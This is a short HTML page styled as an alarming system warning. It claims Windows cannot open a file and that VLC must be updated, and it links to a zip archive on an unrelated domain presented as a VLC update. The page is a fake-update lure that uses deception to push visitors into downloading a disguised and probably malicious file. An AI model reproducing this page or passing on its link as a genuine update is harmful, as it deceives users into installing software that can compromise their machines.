<!DOCTYPE html>
<html>
<head>
    <style>
        body {
            background-color: #b22f1b;
        }

        h1, h2, h3 {
            color: white;
            text-align: center;
            padding: 0px;
        }

        p {
            margin-left: 50px;
            margin-right: 50px;
            font-family: verdana;
            font-size: 20px;
        }

        .more {
            margin-left: 50px;
            margin-right: 50px;
            font-family: verdana;
            color: white;
            font-size: 10px;
        }
    </style>

</head>
<body>
    <body>
        <br /><br /><br /><br /><br /><br /><br /><br /><br /><br /> <br /><br /><br /><br /><br />
        <h1>
            Warning!!!
            windows can not open this file, you must update your VLC software </br>
            <a href="https://panafricaine.com/logiciel/vlc.zip" />Update VLC </a>
            <br />

        </h1>






    </body>
</html>